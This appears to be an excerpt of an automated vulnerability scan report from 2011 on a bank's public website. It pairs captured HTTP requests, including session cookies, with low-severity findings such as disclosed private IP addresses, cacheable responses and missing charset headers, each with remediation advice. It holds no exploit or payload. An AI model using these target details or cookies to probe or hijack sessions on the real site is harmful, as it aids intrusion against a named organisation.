...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
GET /bbt/Personal/Products/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:27 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 39007 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
GET /bbt/about/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:28 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 27429 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> < ...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
GET /bbt/about/privacyandsecurity/completeclientprotection/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:06 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30806 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
GET /bbt/careers/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:31 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 33909 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Car ...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
GET /bbt/customerservice/default.html?WT.svl=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:38 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 26090 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
<meta h ...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
GET /bbt/mobile/mobile-product.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:06 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30223 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
GET /bbt/personal/products/checkcard/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:06 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30982 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
GET /bbt/personal/products/onlinebanking/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:06 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 35890 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
GET /bbt/sitemap.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:35 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 32205 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
<meta h ...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
HTTP/1.1 403 content-type: text/html date: Thu, 03 Feb 2011 14:07:25 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15205 cache-control: private x-powered-by: ASP.NET Content-Length: 15345
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
...[SNIP]... <!-- begin: Cy Site Seal Code --> <script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal.js"> </script> ...[SNIP]...
7. Private IP addresses disclosedpreviousnext There are 4 instances of this issue:
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.
Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
The response contains the following Content-type statement:
content-type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
GET /includes/chat/get-host-ip.asp?0.35303918551653624 HTTP/1.1 Host: www.bbt.com Proxy-Connection: keep-alive Referer: http://www.bbt.com/checking/?ReferralSource=AE&CampIDMaj=AGM&CampIDMin=AR&cmpid=1635 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt
Response
HTTP/1.1 200 OK content-type: text/html date: Thu, 03 Feb 2011 13:41:58 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 35 cache-control: no-cache x-powered-by: ASP.NET expires: Thu, 03 Feb 2011 13:40:58 GMT pragma: no-cache Content-Length: 35